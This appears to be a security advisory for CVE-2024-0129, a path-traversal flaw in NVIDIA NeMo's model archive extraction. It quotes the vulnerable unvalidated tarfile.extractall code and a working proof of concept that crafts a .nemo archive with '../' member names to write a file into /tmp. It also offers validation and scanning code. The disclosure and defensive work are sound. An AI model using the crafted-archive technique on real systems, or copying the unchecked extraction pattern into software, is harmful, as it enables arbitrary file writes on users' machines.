Unsafe extraction of NeMo archive leading to arbitrary file write
CVE Number
CVE-2024-0129
Summary
The _unpack_nemo_file function, which the SaveRestoreConnector class uses during model loading, calls tarfile.extractall() without validating the paths of archive members. As a result, a crafted model archive can write arbitrary files outside the extraction directory when the model is loaded.
Products Impacted
This vulnerability is present in NVIDIA NeMo versions prior to r2.0.0rc0.
CVSS Score: 6.3
AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L
CWE Categorization
CWE‑22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
Details
The vulnerability lies in the _unpack_nemo_file function in the file /nemo/core/connectors/save_restore_connector.py:
def _unpack_nemo_file(path2file: str, out_folder: str, extract_config_only: bool = False) -> str:
    if not os.path.exists(path2file):
        raise FileNotFoundError(f"{path2file} does not exist")
    # we start with an assumption of uncompressed tar,
    # which should be true for versions 1.7.0 and above
    tar_header = "r:"
    try:
        tar_test = tarfile.open(path2file, tar_header)
        tar_test.close()
    except tarfile.ReadError:
        # can be older checkpoint => try compressed tar
        tar_header = "r:gz"
    tar = tarfile.open(path2file, tar_header)
    if not extract_config_only:
        tar.extractall(path=out_folder)
    else:
        members = [x for x in tar.getmembers() if ".yaml" in x.name]
        tar.extractall(path=out_folder, members=members)
    tar.close()
    return out_folder
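One way to close the hole is to validate every member before anything is written. The sketch below uses a hypothetical helper, safe_extractall, which is not part of NeMo and is not the fix NVIDIA shipped. It assumes that a legitimate .nemo archive never needs absolute paths, members that resolve outside out_folder, or links, and it refuses all three.

```python
import os
import tarfile
from typing import Iterable, Optional


def _is_within_directory(directory: str, target: str) -> bool:
    # Resolve both paths, then require target to be directory itself or below it.
    abs_directory = os.path.realpath(directory)
    abs_target = os.path.realpath(target)
    return os.path.commonpath([abs_directory, abs_target]) == abs_directory


def safe_extractall(
    tar: tarfile.TarFile,
    out_folder: str,
    members: Optional[Iterable[tarfile.TarInfo]] = None,
) -> None:
    """Hypothetical helper: extract only if every member stays inside out_folder."""
    selected = list(members) if members is not None else tar.getmembers()
    for member in selected:
        # Reject links outright: a symlink could redirect a later member outside out_folder.
        if member.issym() or member.islnk():
            raise ValueError(f"Refusing to extract link member: {member.name}")
        # Reject absolute names and any name that resolves outside out_folder.
        target = os.path.join(out_folder, member.name)
        if os.path.isabs(member.name) or not _is_within_directory(out_folder, target):
            raise ValueError(f"Blocked path traversal attempt: {member.name}")
    # Every member has been checked, so the actual extraction can proceed.
    tar.extractall(path=out_folder, members=selected)
```

Under this sketch, the two calls in _unpack_nemo_file would become safe_extractall(tar, out_folder) and safe_extractall(tar, out_folder, members=members). On Python 3.12 and later, passing filter="data" to tarfile.extractall() provides comparable protection from the standard library itself.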
The _unpack_nemo_file function is used by several functions and classes in NVIDIA NeMo, most notably the SaveRestoreConnector class, which saves and loads NeMo model files on disk.
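Because SaveRestoreConnector extracts whatever archive it is given, a defensive option is to inspect a .nemo file before loading it. The sketch below is a hypothetical pre-load check, not a NeMo feature. It lists members whose names are absolute or climb out of the extraction directory with "..", and it conservatively flags every symbolic or hard link. It assumes member names use "/" separators, as tar archives normally do.

```python
import posixpath
import sys
import tarfile
from typing import List


def find_unsafe_members(archive_path: str) -> List[str]:
    """Hypothetical check: return member names that would escape the extraction directory."""
    unsafe = []
    # "r:*" lets tarfile auto-detect compression, so both plain (.tar) and
    # gzip-compressed .nemo archives can be inspected without extracting them.
    with tarfile.open(archive_path, "r:*") as tar:
        for member in tar.getmembers():
            name = member.name
            normalized = posixpath.normpath(name)
            if (
                name.startswith("/")
                or normalized == ".."
                or normalized.startswith("../")
                or member.issym()
                or member.islnk()
            ):
                unsafe.append(name)
    return unsafe


if __name__ == "__main__":
    # Usage: python check_nemo.py model1.nemo model2.nemo ...
    for path in sys.argv[1:]:
        for name in find_unsafe_members(path):
            print(f"{path}: suspicious member {name!r}")
```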
To replicate this vulnerability, create a tar archive containing a member whose name includes path-traversal sequences (../), then load it through a model's restore_from method, which delegates to SaveRestoreConnector.restore_from:
import tarfile
# Create a harmless payload file
with open("test.txt", "w") as f:
    f.write("This is a test file")
# Rewrite the member name so that it climbs out of the extraction directory
def change_name(tarinfo):
    tarinfo.name = "../../../../../../../../tmp/" + tarinfo.name
    return tarinfo
with tarfile.open("test.nemo", "w:gz") as tar:
    tar.add("test.txt", filter=change_name)
# Load the archive with restore_from
import nemo.collections.asr as nemo_asr
model = nemo_asr.models.EncDecDiarLabelModel.restore_from(restore_path="test.nemo")
This results in test.txt being written to /tmp/test.txt, outside the directory the archive was meant to be extracted into.
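The landing spot can be reproduced with plain path arithmetic. The sketch below approximates what tarfile does internally: it joins the member name onto the destination directory and normalizes the result. The out_folder value is a hypothetical stand-in for whatever directory NeMo actually extracts into.

```python
import posixpath

# Hypothetical extraction directory; the real one is chosen by the caller.
out_folder = "/tmp/tmp_nemo_restore"
member_name = "../../../../../../../../tmp/test.txt"

# Join the member name onto the destination and normalize the ".." components.
joined = posixpath.join(out_folder, member_name)
resolved = posixpath.normpath(joined)
print(resolved)  # /tmp/test.txt
```

Surplus ".." components are discarded once the path reaches the filesystem root. This is why the proof of concept uses a long run of them: the payload lands in /tmp/ no matter how deeply the extraction directory is nested.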